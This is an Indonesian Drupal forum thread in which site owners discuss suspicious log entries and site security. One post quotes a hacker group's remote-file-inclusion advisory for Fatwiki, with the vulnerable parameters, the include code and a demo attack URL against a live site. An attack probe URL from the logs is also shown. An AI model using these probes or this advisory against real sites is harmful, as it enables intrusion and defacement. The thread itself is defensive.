ngobrol soal keamanan drupal yuk

23 posts / 0 new
Login or register to post comments
Last post
Fri, 22 Jul 2011 - 22:45
#1
mbahlol
mbahlol's picture
Offline
Joined: 10 Apr 2011
Points: 610
ngobrol soal keamanan drupal yuk

Dear all,

pernah gak kalian yang udah punya live site lihat report trus ada akses yang aneh2. misal contoh aku nih ada akses page not found.

aku liat dia menambahkan file php ke url kita. contohnya begini

http://www.***.com/monatsblatt.php?kal_class_path=http://localhost/scan/idx????&tool=id

atau

artikel/drupal-membuat-tanggal-tampil-seperti-kalender/monatsblatt.php.

 

aku cobain cari ke google tentang monatsblatt.php. yang muncul begini nih

 

#############################################################################################################
## Fatwiki (fwiki) Remote FiLe include RFI			                                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 10 januari, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]

[ BUG ]

[!] datumscalc.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");

[!] monatsblatt.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
     - require_once("$kal_class_path/minikal.php");

[ DEMO ]

http://www.reisekaefer.de/helpwiki/datumscalc.php?kal_class_path=[EVILc0de]

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,gonzhack ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone u will be p0wned :P
[+] Tukulesto : kapan keliling kota lagi ?? hahaha
[+] gonzhack : semoga balikan ya s0b .. ane dukung ..
[+] cimpli : janganlah bermimpi tentang menikahi Maria Ozawa .. hahahhah

[ QUOTE ]

[+] we are not dead .. INDONESIANCODER still r0x !
[+] nothing secure ..

kayanya sih mau deface ya......mohon berbagi pengalamnnya

 

Terima kasih

Top
Tags:
Sat, 23 Jul 2011 - 08:57
#2
iS
iS's picture
Offline
Joined: 5 Aug 2010
Points: 498
Barangkali karena ga ngerti

Barangkali karena ga ngerti SEO dus situs2 yg pernah aku buat ga muncul di mesin2 pencari ternama jadinya ga ada pengunjung/log yg aneh2, haha .. Tapi situsnya kang mbahlol tetap aman kan?

Top
Sat, 23 Jul 2011 - 09:07
#3
creative_hawk
creative_hawk's picture
Offline
Joined: 25 May 2011
Points: 261
belum kena deface itu mas..

belum kena deface itu mas.. mereka masih cari bug dari web mas...

saya baca-baca drupal 5 ke bawah banyak yang kena deface.. tapi semenjak 6 belum pernah baca ada yang kena :D

CMIIW

Top
Sat, 23 Jul 2011 - 11:02
#4
mbahlol
mbahlol's picture
Offline
Joined: 10 Apr 2011
Points: 610
kalo.....

 

@iS kalo seo udah cobain dari drupal id ini. sampe saat ini sih aman.
lagi mantau log terus sama ip yang nyobain akses tersebut aku banned aja daripada repot.
database juga udah backup. gawat kalo kena drop. bisa menangis semalam kaya lagunya audi
 
@creative_hawk iya untunglah belum dan jangan sampe aja.
kasi tau bos link tentang info tersebut. kalo drupal 6 belum kena brarti masih aman lah.
 
susah nih kalo hacker dah turun gunung web kita mesti jaga bener2
Top
Sat, 23 Jul 2011 - 13:24
#5
creative_hawk
creative_hawk's picture
Offline
Joined: 25 May 2011
Points: 261
kalo linknya, coba search

kalo linknya, coba search di google = hack drupal

http://drupal.org/node/185358

http://drupal.org/node/916130 < ada sih yang kena (baru baca), tapi katanya "I have lost cpanel at the moment", jadi  gak pasti kalo di deface dari indexnya :D

 

saya juga lihat ada http://drupal.org/project/hacked

itu ada module, kurang faham juga.. :D

Top
Sat, 23 Jul 2011 - 23:40
(Reply to #5) #6
balonkucuma4
balonkucuma4's picture
Offline
Joined: 3 Jan 2011
Points: 96
ane pernah

ane pernah gan..

http://www.bajigur.org/user/register+[PLM=0][R]+GET+http:/www.bajigur.org/user/register+[0,32960,32896]+->+[R]+POST+http:/www.bajigur.org/user/register+[0,0,33033]+->+[L]+GET+http:/www.bajigur.org/user+[0,30610,30546]+->+[L]+POST+http:/www.bajigur.org/user+[15846,0,30727]

dua kali gan kek gitu yang satunya gini

http://www.bajigur.org/register+[PLM=0][R]+GET+http:/www.bajigur.org/user/register+[0,32960,32896]+->+[R]+POST+http:/www.bajigur.org/user/register+[0,0,33033]+->+[L]+GET+http:/www.bajigur.org/user+[0,30610,30546]+->+[L]+POST+http:/www.bajigur.org/user+[15846,0,30727]

gak tau tu mau ngapain,,

Top
Sun, 24 Jul 2011 - 05:47
(Reply to #7) #7
creative_hawk
creative_hawk's picture
Offline
Joined: 25 May 2011
Points: 261
wah ane kurang tau om, ane

wah ane kurang tau om, ane bukan defacer sih :D

yang pernah ane baca-baca sih, mereka biasanya nyari kelemahan dari website kita (kesalahan code)

yah kalo masih ada yang kena entah dari core drupal atau module2 yang kita pasang masih ada celah, namanya juga manusia yang buat :D


tapi sejauh ini ane belum pernah liat yang drupal 6.x+ kena deface kecuali Cpanelnya yang  kena :D

Top
Wed, 27 Jul 2011 - 21:32
(Reply to #5) #8
anjjriit
anjjriit's picture
Offline
Joined: 1 May 2010
Points: 892
sepertinya module itu nyecan

sepertinya module itu nyecan source drupal kita lalu nebandingin dengan aslinya, so kalau kita sedikit ngotak-ngatik module atau template, bisa bisa banyak merahnya kali yah ?????

Top
Sat, 23 Jul 2011 - 23:18
#9
erry
erry's picture
Offline
Joined: 21 Jul 2011
Points: 76
waduh aku malah belum ngerti

waduh aku malah belum ngerti nih, cara cari taunya gimana ya om? maksudnya tau tamu yang dateng itu orang aneh/iseng apa bukan? mohon petunjuknya... trus untuk antisipasinya apa yang paling ampuh om? apa dengan back up manual atau ada auto backup? tks.

Top
Sun, 24 Jul 2011 - 07:55
#10
mbahlol
mbahlol's picture
Offline
Joined: 10 Apr 2011
Points: 610
manual

kalo aku backupnya manual aja bos. databasenya aku donlot pake module backup dan migrate. soalnya ukurannya kecil jadi lebih cepat. itupun baru2 ini aja backup rutin. aku baca2 kalo kita mesti up to date terus kalo ada upgrade baru terutama yang security. kalo keamanan cpanel mungkin itu tergantung dari pihak hosting kali ya soal keamanannya. aku ada nanya drupal.org nya. ini link jawaban mereka http://drupal.org/node/1226852#comment-4771074

Top
Sun, 24 Jul 2011 - 08:46
(Reply to #9) #11
creative_hawk
creative_hawk's picture
Offline
Joined: 25 May 2011
Points: 261
  asiik, di sana ada yang j

 

asiikdi sana ada yang jawab juga ternyata...

itu jenis inject website dengan cara RFI (remote file inclusion.biasanya make bot dan bot dapetnya biasanya random..

tenang mas web mas aman  dan akan balik lagi orang itu (semoga) :D

Top

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.